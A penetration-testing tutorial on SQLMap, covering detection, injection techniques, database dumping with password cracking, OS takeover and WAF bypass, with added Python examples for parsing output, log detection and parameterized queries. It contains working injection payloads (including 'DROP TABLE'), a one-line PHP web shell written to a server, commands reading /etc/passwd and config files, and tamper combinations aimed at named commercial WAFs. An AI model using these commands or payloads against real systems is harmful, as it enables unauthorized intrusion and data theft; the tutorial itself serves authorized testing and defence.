1. Introduction to SQLMap
SQLMap is an open-source tool that automates the detection and exploitation of SQL Injection vulnerabilities in web applications. Developed by Bernardo Damele and Miroslav Stampar, SQLMap has become a staple in every professional penetration tester's toolkit.
SQL Injection itself is a vulnerability that lets an attacker manipulate the SQL queries an application sends to its database. Through SQL Injection an attacker can read sensitive data, modify data, run administrative operations on the database, and in some cases take over the server's operating system.
SQLMap supports every common SQL injection type: Boolean-based blind, Time-based blind, Error-based, UNION query, Stacked queries, and Out-of-band. It supports more than 30 database management systems (DBMS), including MySQL, PostgreSQL, Microsoft SQL Server, Oracle, SQLite, and many more.
Why Is SQL Injection Still Relevant?
| Fact | Explanation |
|---|---|
| OWASP Top 10 | SQL Injection is listed in the OWASP Top 10 under Injection (A03:2021) |
| Most Frequently Found | SQLi remains one of the most common vulnerabilities in web apps |
| High Impact | Can lead to full database compromise, data breach, and RCE |
| Regulation | PCI DSS, GDPR, and other regulations require protection against SQLi |
| Easy to Automate | SQLMap makes exploiting SQLi very easy, even for beginners |
SQL Injection testing may only be performed on systems you own or for which you hold written permission (an authorization letter). SQL Injection against systems without permission is a cybercrime that can be prosecuted.
[Figure: SQLMap workflow. 1. INPUT (URL, POST, Cookie, Headers) → 2. DETECT (test all params, DBMS, technique) → 3. ENUM (DBMS, databases, tables, columns) → 4. EXTRACT (dump data, users, passwords) → 5. TAKEOVER (OS shell, file R/W, backdoor) → 6. PREVENT (patch, parameterized queries)]
2. Installation & Setup
2.1 Installing SQLMap
# ===== INSTALLING SQLMAP =====
# On Kali Linux it is included by default
# If it is missing:
sudo apt update && sudo apt install sqlmap
# Install from GitHub (latest version)
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
# Run it
python sqlmap.py --version
# or
python3 sqlmap.py --version
# ===== ALIAS FOR CONVENIENCE =====
echo 'alias sqlmap="python3 /path/to/sqlmap-dev/sqlmap.py"' >> ~/.bashrc
source ~/.bashrc
# ===== UPDATING SQLMAP =====
cd sqlmap-dev
git pull origin master
# or
python3 sqlmap.py --update
# ===== VERIFYING THE INSTALLATION =====
sqlmap --version
# sqlmap/1.x.x
# Guided wizard mode for beginners (optional)
sqlmap --wizard
2.2 Preparing a Testing Environment
# ===== SETTING UP A LAB FOR LEARNING =====
# 1. DVWA (Damn Vulnerable Web Application), popular for learning
docker run --rm -it -p 80:80 vulnerables/web-dvwa
# 2. SQLi-Labs (dedicated to learning SQL Injection)
git clone https://github.com/Audi-1/sqli-labs.git
cd sqli-labs
# Set it up on a web server
# 3. HackTheBox / TryTheBox, legal online labs
# 4. PortSwigger Web Security Academy, free
# https://portswigger.net/web-security/sql-injection
# ===== STARTING THE TEST =====
# Open DVWA in the browser: http://localhost
# Login: admin / password
# Set the security level to: Low
# Navigate to: SQL Injection page
# Note the URL: http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit
# The "id" parameter is likely vulnerable to SQLi
3. Detecting SQL Injection
3.1 Basic Detection
# ===== BASIC DETECTION =====
# URL with a GET parameter
sqlmap -u "http://target.com/page.php?id=1"
# With POST data
sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin"
# With a cookie (authenticated testing)
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"
# With custom headers
sqlmap -u "http://target.com/api/data" --headers="X-Token: abc123\nAuthorization: Bearer xyz"
# With an HTTP request file (from Burp Suite)
sqlmap -r request.txt
# request.txt = raw HTTP request saved from Burp
# ===== DETECTION OPTIONS =====
# Test all parameters, answering every prompt with the default
sqlmap -u "http://target.com/page.php?id=1&name=test" --batch
# Test a specific parameter
sqlmap -u "http://target.com/page.php?id=1&name=test" -p id
# Skip parameters that do not appear to be dynamic
sqlmap -u "http://target.com/page.php?id=1" --skip-static
# Test level (1-5, default: 1)
# Level 1 = basic, Level 5 = run every test
sqlmap -u "http://target.com/page.php?id=1" --level=5
# Risk level (1-3, default: 1)
# Risk 1 = safe, Risk 3 = include heavy tests (e.g. OR-based ones that may alter data)
sqlmap -u "http://target.com/page.php?id=1" --risk=3
3.2 Reading the Detection Results
# ===== SAMPLE DETECTION OUTPUT =====
# [*] starting @ 10:30:00 2026-06-26
#
# [INFO] testing connection to the target URL
# [INFO] checking if the target is protected by some kind of WAF/IPS
# [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
# [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY clause'
# [INFO] testing 'MySQL >= 5.0.12 time-based blind'
# [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
#
# GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
#
# sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
# ---
# Parameter: id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: id=1 AND 1=1
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY clause
# Payload: id=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
#
# Type: time-based blind
# Title: MySQL >= 5.0.12 time-based blind
# Payload: id=1 AND SLEEP(5)
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 3 columns
# Payload: id=-1 UNION ALL SELECT NULL,NULL,CONCAT(0x7162767671,0x4e646d6e534d68575a56546f4250757276674d4d6a6b6d7851584b5373646b5a577854486f487675,0x717a767671)-- -
# ---
#
# [INFO] the back-end DBMS is MySQL
# back-end DBMS: MySQL >= 5.0
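To turn the summary above into structured findings for a report or a tracking ticket, here is an added example (not from the original page or the sqlmap project) that parses the Parameter / Type / Title / Payload block and the back-end DBMS line; the sample text is constructed after the output shown above.

```python
"""Added example, not part of the original page or the sqlmap project:
parse sqlmap's injection-point summary into structured findings."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class InjectionPoint:
    parameter: str   # e.g. "id"
    place: str       # e.g. "GET", "POST", "Cookie"
    technique: str   # the "Type:" line
    title: str       # the "Title:" line
    payload: str     # the "Payload:" line


# Constructed sample modelled on the detection output shown above.
SAMPLE_OUTPUT = """
[INFO] the back-end DBMS is MySQL
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind
    Payload: id=1 AND SLEEP(5)
---
Parameter: user (Cookie)
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: user=-1 UNION ALL SELECT NULL,NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0
"""


def parse_sqlmap_output(text: str) -> Tuple[List[InjectionPoint], Optional[str]]:
    """Return (injection points, back-end DBMS string or None)."""
    points: List[InjectionPoint] = []
    dbms = None
    param = place = None
    technique = title = ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("# ").strip()  # tolerate '# ' quoting as used above
        m = re.match(r"Parameter: (\S+) \((\w+)\)$", line)
        if m:
            param, place = m.group(1), m.group(2)
            continue
        if line.startswith("Type: "):
            technique = line[len("Type: "):]
        elif line.startswith("Title: "):
            title = line[len("Title: "):]
        elif line.startswith("Payload: ") and param is not None:
            points.append(InjectionPoint(param, place, technique, title, line[len("Payload: "):]))
        elif line.startswith("back-end DBMS: "):
            dbms = line[len("back-end DBMS: "):]
    return points, dbms


def techniques_by_parameter(points: List[InjectionPoint]) -> dict:
    """Summarise which technique types hit each parameter, for triage."""
    summary: dict = {}
    for p in points:
        summary.setdefault(f"{p.parameter} ({p.place})", []).append(p.technique)
    return summary


if __name__ == "__main__":
    pts, backend = parse_sqlmap_output(SAMPLE_OUTPUT)
    print(backend, techniques_by_parameter(pts))
```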
4. SQL Injection Techniques
SQLMap supports several different SQL Injection techniques. Understanding them matters both for using SQLMap effectively and for knowing what is happening behind the scenes.
4.1 Boolean-Based Blind
# ===== BOOLEAN-BASED BLIND =====
# Principle: send a query that evaluates to TRUE or FALSE
# and observe the difference in the response (content, HTTP code, etc.)
# Example queries:
# Normal: SELECT * FROM users WHERE id = 1
# Injected (TRUE): SELECT * FROM users WHERE id = 1 AND 1=1
# Injected (FALSE): SELECT * FROM users WHERE id = 1 AND 1=2
# If the response differs between TRUE and FALSE, the parameter is vulnerable!
# SQLMap automatically compares response length, content, etc.
# Force a specific technique:
sqlmap -u "http://target.com/page.php?id=1" --technique=B
# Technique codes accepted by --technique:
# B = Boolean-based blind
# E = Error-based
# U = UNION query-based
# S = Stacked queries
# T = Time-based blind
# Q = Inline queries
# (Out-of-band has no technique letter; see section 4.4)
# Combining techniques:
sqlmap -u "http://target.com/page.php?id=1" --technique=BEU
# Test only Boolean, Error, and UNION
4.2 Time-Based Blind
# ===== TIME-BASED BLIND =====
# Principle: use sleep/delay functions to infer data
# If the query is TRUE the server delays; if FALSE the response is fast
# MySQL: AND SLEEP(5)
# PostgreSQL: AND pg_sleep(5)
# MSSQL: WAITFOR DELAY '0:0:5'
# Oracle: AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)
# Force time-based:
sqlmap -u "http://target.com/page.php?id=1" --technique=T
# Custom delay (default: 5 seconds)
sqlmap -u "http://target.com/page.php?id=1" --time-sec=10
# Use --time-sec to avoid false positives on slow connections
4.3 Error-Based & UNION-Based
# ===== ERROR-BASED =====
# Principle: use database error messages to extract data
# Very fast, because the data comes back directly in the error message
# MySQL error functions:
# - EXTRACTVALUE()
# - UPDATEXML()
# - FLOOR(RAND()) GROUP BY (double-query error)
# Example:
# id=1 AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e))
# Error: XPATH syntax error: '~5.7.26~'
# Force error-based:
sqlmap -u "http://target.com/page.php?id=1" --technique=E
# ===== UNION-BASED =====
# Principle: use UNION SELECT to pull data from other columns
# into the same response
# Examples:
# id=-1 UNION SELECT 1,2,3
# id=-1 UNION SELECT 1,version(),3
# id=-1 UNION SELECT 1,group_concat(table_name),3
# FROM information_schema.tables
# Force UNION:
sqlmap -u "http://target.com/page.php?id=1" --technique=U
# If UNION fails, try --union-cols and --union-char:
sqlmap -u "http://target.com/page.php?id=1" \
--technique=U --union-cols=5 --union-char=1
4.4 Stacked Queries & Out-of-Band
# ===== STACKED QUERIES =====
# Principle: run multiple SQL statements in a single request
# Supports INSERT, UPDATE, DELETE, not just SELECT
# Examples:
# id=1; DROP TABLE users--
# id=1; INSERT INTO users VALUES('hacker','hacked')--
# Stacked queries are supported on:
# - PostgreSQL (always)
# - MSSQL (always)
# - MySQL (only if multi-query is enabled)
# - Oracle (only via certain techniques)
# Force stacked:
sqlmap -u "http://target.com/page.php?id=1" --technique=S
# ===== OUT-OF-BAND =====
# Principle: extract data over an alternative channel (DNS/HTTP)
# Useful when there is no direct response
# MySQL: LOAD_FILE() to a UNC path, DNS exfiltration
# MSSQL: xp_dirtree, DNS exfiltration
# Oracle: HTTPurity
# Use out-of-band (there is no --technique letter for it; SQLMap drives
# DNS exfiltration through --dns-domain, which needs a DNS domain you control):
sqlmap -u "http://target.com/page.php?id=1" --dns-domain=<your-dns-domain>
5. Database Enumeration
5.1 Database Information
# ===== DATABASE ENUMERATION =====
# Fingerprint the DBMS (name and version)
sqlmap -u "http://target.com/page.php?id=1" --fingerprint
# Get the DBMS banner
sqlmap -u "http://target.com/page.php?id=1" --banner
# Get the current user
sqlmap -u "http://target.com/page.php?id=1" --current-user
# Get the current database
sqlmap -u "http://target.com/page.php?id=1" --current-db
# Get the hostname
sqlmap -u "http://target.com/page.php?id=1" --hostname
# Check whether the user is a DBA
sqlmap -u "http://target.com/page.php?id=1" --is-dba
# Get all of the above at once
sqlmap -u "http://target.com/page.php?id=1" --banner --current-user --current-db --is-dba
5.2 Enumerating Databases, Tables, Columns
# ===== LIST ALL DATABASES =====
sqlmap -u "http://target.com/page.php?id=1" --dbs
# Output:
# [*] information_schema
# [*] mysql
# [*] performance_schema
# [*] webapp_db
# ===== LIST TABLES IN A DATABASE =====
sqlmap -u "http://target.com/page.php?id=1" -D webapp_db --tables
# Output:
# +------------+
# | users      |
# | products   |
# | orders     |
# | admin      |
# +------------+
# ===== LIST COLUMNS IN A TABLE =====
sqlmap -u "http://target.com/page.php?id=1" -D webapp_db -T users --columns
# Output:
# +----------+--------------+
# | Column   | Type         |
# +----------+--------------+
# | id       | int(11)      |
# | username | varchar(50)  |
# | password | varchar(255) |
# | email    | varchar(100) |
# | role     | varchar(20)  |
# +----------+--------------+
# ===== ROW COUNT =====
sqlmap -u "http://target.com/page.php?id=1" -D webapp_db -T users --count
# Output: [INFO] table 'webapp_db.users' has 1523 entries
6. Data Extraction
6.1 Dumping Data
# ===== DUMP AN ENTIRE TABLE =====
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump
# Data is saved to: ~/.sqlmap/output/target.com/dump/webapp_db/users.csv
# ===== DUMP SPECIFIC COLUMNS =====
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users -C "username,password" --dump
# ===== DUMP WITH A LIMIT =====
# Only the first 10 rows
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --start=1 --stop=10
# ===== CONDITIONAL DUMP =====
# Only rows with role=admin
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --where="role='admin'"
# ===== DUMP ALL DATABASES =====
# WARNING: use with care, this is very slow!
sqlmap -u "http://target.com/page.php?id=1" --dump-all
# ===== DUMP WITH PASSWORD CRACKING =====
# When a dumped column looks like a password column, SQLMap detects the hash
# format and offers to crack it with a dictionary attack using its built-in wordlist
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users -C "username,password" --dump \
--passwords
# --passwords additionally enumerates (and tries to crack) the DBMS users' own password hashes
# ===== SEARCH DATA =====
# Search for columns whose name contains "password"
sqlmap -u "http://target.com/page.php?id=1" --search -C password
# Search for tables whose name contains "user"
sqlmap -u "http://target.com/page.php?id=1" --search -T user
# Search for databases whose name contains "web"
sqlmap -u "http://target.com/page.php?id=1" --search -D web
6.2 Output Format
# ===== CUSTOM OUTPUT =====
# Output to a CSV file
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --dump-format=CSV
# Output formats: CSV, HTML, SQLITE
sqlmap -u "http://target.com/page.php?id=1" \
-D webapp_db -T users --dump --dump-format=HTML
# ===== LOGGING =====
# Verbose output (more detail)
sqlmap -u "http://target.com/page.php?id=1" -v 3
# Level: 0-6 (default: 1)
# Write output to a directory
sqlmap -u "http://target.com/page.php?id=1" \
--batch --output-dir=/tmp/sqlmap_logs/
# ===== BATCH MODE (automatic, no interaction) =====
# Useful for automation
sqlmap -u "http://target.com/page.php?id=1" --batch
# Automatically picks the default answer for every prompt
# ===== SESSION MANAGEMENT =====
# Save the session so you can resume later
sqlmap -u "http://target.com/page.php?id=1" \
--session-file=/tmp/session.session
# Resume: run again with the same session file and SQLMap continues where it stopped
sqlmap -u "http://target.com/page.php?id=1" \
--session-file=/tmp/session.session
# Discard the saved session and start over
sqlmap -u "http://target.com/page.php?id=1" \
--session-file=/tmp/session.session --flush-session
7. OS Takeover
7.1 File System Access
# ===== READ FILES =====
# Read a file from the server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/hostname"
sqlmap -u "http://target.com/page.php?id=1" --file-read="/var/www/html/config.php"
sqlmap -u "http://target.com/page.php?id=1" --file-read="C:\\Windows\\win.ini"
sqlmap -u "http://target.com/page.php?id=1" --file-read="C:\\xampp\\htdocs\\config.php"
# ===== WRITE FILES =====
# Write a file to the server (requires the FILE privilege)
# Useful for writing a web shell
sqlmap -u "http://target.com/page.php?id=1" \
--file-write="shell.php" \
--file-dest="/var/www/html/shell.php"
# Contents of shell.php:
# <?php echo system($_GET['cmd']); ?>
# ===== CHECK PRIVILEGE =====
sqlmap -u "http://target.com/page.php?id=1" --is-dba
# On MySQL you must be DBA for file read/write
7.2 OS Shell
# ===== OS SHELL =====
# Get an interactive OS shell
# Requires: DBA privilege + FILE privilege (MySQL)
sqlmap -u "http://target.com/page.php?id=1" --os-shell
# If successful, SQLMap will:
# 1. Upload a web shell to the server
# 2. Provide an interactive shell
# ===== OS COMMAND EXECUTION =====
# Run a single command
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="id"
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami"
# ===== SQL SHELL =====
# Interactive SQL shell
sqlmap -u "http://target.com/page.php?id=1" --sql-shell
# From the SQL shell:
sql-shell> SELECT version();
sql-shell> SELECT user();
sql-shell> SHOW DATABASES;
sql-shell> SELECT * FROM mysql.user;
8. Tamper Scripts & WAF Bypass
Tamper scripts are SQLMap's most powerful feature for bypassing a WAF (Web Application Firewall) or IPS (Intrusion Prevention System). A tamper script rewrites the SQL injection payload so that the security system does not recognise it while the payload still performs the same function.
8.1 Popular Tamper Scripts
| Tamper Script | Function | Target WAF |
|---|---|---|
| between | Replaces > with BETWEEN | Generic WAF |
| space2comment | Replaces spaces with /**/ comments | ModSecurity |
| space2plus | Replaces spaces with + | Generic WAF |
| space2randomblank | Replaces spaces with random whitespace | Generic WAF |
| randomcase | Randomises the letter case | Case-sensitive WAF |
| charencode | URL-encodes every character | ModSecurity |
| base64encode | Base64-encodes the whole payload | Generic WAF |
| halfversionedmorekeywords | Adds MySQL versioned comments | MySQL-specific WAF |
| apostrophemask | Replaces apostrophes with UTF-8 equivalents | Generic WAF |
| greatest | Replaces > with GREATEST() | Generic WAF |
| ifnull2ifisnull | Replaces IFNULL with IF IS NULL | MySQL WAF |
| modsecurityversioned | ModSecurity bypass | ModSecurity |
| unionalltounion | Replaces UNION ALL with UNION | Generic WAF |
| unmagicquotes | Bypasses magic_quotes_gpc | PHP magic_quotes |
| lowercase | Converts everything to lowercase | Case-sensitive WAF |
8.2 Using Tamper Scripts
# ===== SINGLE TAMPER =====
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment
# ===== MULTIPLE TAMPERS (STACKING) =====
# Use commas to chain several tamper scripts
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,randomcase,between
# Order matters! The scripts are applied in sequence
# ===== POPULAR TAMPER COMBINATIONS =====
# Combination for ModSecurity bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,randomcase,charencode
# Combination for Cloudflare bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=between,randomcase,space2plus
# Combination for Akamai bypass:
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2randomblank,randomcase,greatest
# ===== LIST ALL TAMPER SCRIPTS =====
sqlmap --list-tamper
# ===== TAMPER WITH CUSTOM EXPRESSION =====
# Some tamper scripts accept parameters
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=space2comment,between,randomcase \
--skip-static \
--random-agent \
--technique=BEU
8.3 WAF Bypass Without Tamper Scripts
# ===== WAF BYPASS TECHNIQUES =====
# 1. Random User-Agent
sqlmap -u "http://target.com/page.php?id=1" --random-agent
# 2. Custom User-Agent
sqlmap -u "http://target.com/page.php?id=1" \
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# 3. Delay between requests (avoids rate limiting)
sqlmap -u "http://target.com/page.php?id=1" --delay=2
# 4. Proxy to get around an IP block
sqlmap -u "http://target.com/page.php?id=1" \
--proxy="http://127.0.0.1:8080" # Burp Suite proxy
# 5. TOR for anonymity
sqlmap -u "http://target.com/page.php?id=1" --tor --tor-type=SOCKS5
# 6. Custom headers
sqlmap -u "http://target.com/page.php?id=1" \
--headers="X-Forwarded-For: 127.0.0.1\nX-Real-IP: 10.0.0.1"
# 7. Chunked transfer encoding
sqlmap -u "http://target.com/page.php?id=1" --chunked
# 8. HTTP parameter pollution
sqlmap -u "http://target.com/page.php?id=1" --hpp
# 9. Skip URL encoding
sqlmap -u "http://target.com/page.php?id=1" --skip-urlencode
# 10. Custom prefix/suffix
sqlmap -u "http://target.com/page.php?id=1" \
--prefix="')" --suffix="-- -"
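From the defender's side, the tamper scripts and options above matter because a signature that matches the raw request string misses obfuscated payloads. The following is an added example (not from the original page or the sqlmap project) of a log-side check that normalises request paths before matching the techniques from section 4 and also flags sqlmap's default User-Agent; the Apache-style log lines are constructed.

```python
"""Added example, not part of the original page or the sqlmap project:
a log-side detector that normalises request URLs before pattern matching,
so tamper-style obfuscation (space2comment, randomcase, space2plus,
charencode) and the default sqlmap User-Agent are still caught."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines, not real traffic.
SAMPLE_LOG = r"""
203.0.113.5 - - [26/Jun/2026:10:30:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jun/2026:10:30:02 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.5 - - [26/Jun/2026:10:30:03 +0000] "GET /page.php?id=1/**/aNd/**/sLeEp(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jun/2026:10:30:04 +0000] "GET /page.php?id=-1+%55NION+ALL+SELECT+NULL,NULL,NULL--+- HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Jun/2026:10:30:05 +0000] "GET /page.php?id=1%253B%2520DROP%2520TABLE%2520users-- HTTP/1.1" 500 120 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Jun/2026:10:31:00 +0000] "GET /page.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One signature per technique listed in section 4; matched after normalisation.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
    ("time-based blind",    re.compile(r"\b(sleep|pg_sleep|benchmark)\s*\(|waitfor\s+delay")),
    ("error-based",         re.compile(r"\b(extractvalue|updatexml)\s*\(|floor\s*\(\s*rand")),
    ("union query",         re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("stacked queries",     re.compile(r";\s*(drop|insert|update|delete|create|exec)\b")),
]


def normalise(raw: str) -> str:
    """Undo the common tamper transformations before matching."""
    s = raw
    for _ in range(3):                 # charencode / double URL-encoding
        decoded = unquote_plus(s)      # also turns '+' into ' ' (space2plus)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", " ", s)   # space2comment: /**/ back to whitespace
    s = re.sub(r"\s+", " ", s)         # space2randomblank: collapse runs of blanks
    return s.lower()                   # randomcase


def scan_log(text: str) -> list:
    """Return one finding per request that matches a signature or sqlmap's UA."""
    findings = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        norm = normalise(m.group("path"))
        hits = [name for name, sig in SIGNATURES if sig.search(norm)]
        sqlmap_ua = "sqlmap" in m.group("ua").lower()
        if hits or sqlmap_ua:
            findings.append({"ip": m.group("ip"), "path": m.group("path"),
                             "techniques": hits, "sqlmap_ua": sqlmap_ua})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```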
9. Advanced Techniques
9.1 Request Manipulation
# ===== WITH A REQUEST FILE (RAW HTTP) =====
# Save the raw request from Burp Suite to a file:
# POST /login.php HTTP/1.1
# Host: target.com
# Cookie: PHPSESSID=abc123
# Content-Type: application/x-www-form-urlencoded
#
# username=admin*&password=test*
# (*) = marker for the parameters to test
sqlmap -r request.txt --batch
# ===== JSON PAYLOAD =====
# Modern APIs often use JSON
sqlmap -u "http://target.com/api/login" \
--data='{"username":"admin*","password":"test"}' \
--headers="Content-Type: application/json" \
-p username
# ===== MULTIPART FORM DATA =====
# Upload form
sqlmap -u "http://target.com/upload.php" \
--data='name=test*&file=test.pdf' \
--method=PUT
# ===== CUSTOM INJECTION MARKER =====
# (*) marks the injection point
sqlmap -u "http://target.com/page.php?id=1*&name=test"
# ===== SECOND-ORDER INJECTION =====
# When the payload is executed by a second request
sqlmap -u "http://target.com/register.php" \
--data="username=test*&password=test" \
--second-url="http://target.com/profile.php"
# ===== CUSTOM EVAL =====
# Run Python code to modify the payload before each request
sqlmap -u "http://target.com/page.php?id=1" \
--eval="import hashlib; id=hashlib.md5(id.encode()).hexdigest()"
9.2 Optimization & Performance
# ===== PERFORMANCE & OPTIMISATION =====
# 1. Multi-threading (default: 1)
sqlmap -u "http://target.com/page.php?id=1" --threads=10
# Max: 10 threads (be careful with the target server)
# 2. Predictive output (faster, fewer requests)
sqlmap -u "http://target.com/page.php?id=1" --predict-output
# 3. Match on a string that is stable in TRUE responses
sqlmap -u "http://target.com/page.php?id=1" \
--string="found" # a response containing "found" = TRUE
# 4. Match on the HTTP status code
sqlmap -u "http://target.com/page.php?id=1" \
--code=200 # only HTTP 200 counts as TRUE
# 5. Batch mode, no interaction
sqlmap -u "http://target.com/page.php?id=1" --batch
# 6. Flush the session, start from scratch
sqlmap -u "http://target.com/page.php?id=1" --flush-session
# 7. Skip certain techniques by listing only the ones you want
# (--skip is for skipping parameters, not tests)
sqlmap -u "http://target.com/page.php?id=1" \
--technique=BEU # no time-based (T) or stacked (S) tests
# 8. Tuning detection
sqlmap -u "http://target.com/page.php?id=1" \
--level=5 --risk=3 \
--threads=5 \
--batch
10. Preventing SQL Injection
10.1 Prepared Statements (Parameterized Queries)
<?php
// ❌ VULNERABLE TO SQL INJECTION
$user_id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $user_id";
$result = mysqli_query($conn, $query);
// An attacker can inject: id=1 UNION SELECT password FROM admin
// ✅ SAFE: prepared statements (PDO)
$pdo = new PDO('mysql:host=localhost;dbname=app', 'user', 'pass');
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = :id");
$stmt->execute(['id' => $_GET['id']]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
// ✅ SAFE: prepared statements (MySQLi)
$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
// ✅ SAFE: do not forget input validation!
// filter_input() returns false for a non-integer and null when the parameter is absent
$user_id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($user_id === false || $user_id === null) {
    die("Invalid input");
}
// ✅ SAFE: input validation + parameterized queries
// Always combine both!
?>
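The same lookup as above, written the vulnerable way and the parameterized way in Python against an in-memory SQLite table, is an added example (not from the original page) that lets you observe directly what the payloads discussed on this page do to each version; the table rows are constructed.

```python
"""Added example, not part of the original page: the lookup from the PHP
section written the vulnerable way and the parameterized way in Python,
run against an in-memory SQLite table of constructed sample rows, so the
effect of the payloads discussed on this page can be observed directly."""
import sqlite3
from typing import Optional


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice", "hash_a", "admin"),   # constructed rows, hashes are placeholders
        (2, "bob",   "hash_b", "user"),
        (3, "carol", "hash_c", "user"),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # String interpolation: the input becomes part of the SQL grammar,
    # exactly like "SELECT * FROM users WHERE id = $user_id" in the PHP above.
    query = f"SELECT id, username, role FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id) -> list:
    # Placeholder binding: the driver sends the input as a value, never as SQL,
    # so "1 OR 1=1" is compared against id as a literal string and matches nothing.
    return conn.execute(
        "SELECT id, username, role FROM users WHERE id = ?", (user_id,)
    ).fetchall()


def validate_id(raw: str) -> Optional[int]:
    # Allowlist validation, the counterpart of FILTER_VALIDATE_INT above:
    # an id is a string of digits and nothing else.
    return int(raw) if raw.isdigit() else None


def handle_request(conn: sqlite3.Connection, raw_id: str) -> list:
    """Validation and parameterization combined, as the page recommends."""
    user_id = validate_id(raw_id)
    if user_id is None:
        return []            # reject, in place of the die("Invalid input") above
    return lookup_safe(conn, user_id)


if __name__ == "__main__":
    db = setup_db()
    for payload in ("1", "1 OR 1=1", "-1 UNION SELECT id, password, role FROM users"):
        print(repr(payload))
        print("  vulnerable:", lookup_vulnerable(db, payload))
        print("  safe:      ", lookup_safe(db, payload))
        print("  validated: ", handle_request(db, payload))
```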
10.2 Prevention Best Practices
| Technique | Priority | Explanation |
|---|---|---|
| Prepared Statements | Mandatory | Separate the SQL query from the data; the primary defence |
| ORM (Object-Relational Mapping) | Mandatory | Use an ORM such as SQLAlchemy, Eloquent, Hibernate |
| Input Validation | Mandatory | Validate all input; use an allowlist approach |
| Least Privilege | Mandatory | The database user has only the minimal permissions it needs |
| Stored Procedures | Important | Use safely written stored procedures |
| Error Handling | Important | Never expose SQL errors to the user |
| WAF | Supplementary | Web Application Firewall as an additional layer |
| Security Testing | Mandatory | Regular pen tests and code review |
11. Comprehension Quiz
Test your understanding of SQLMap: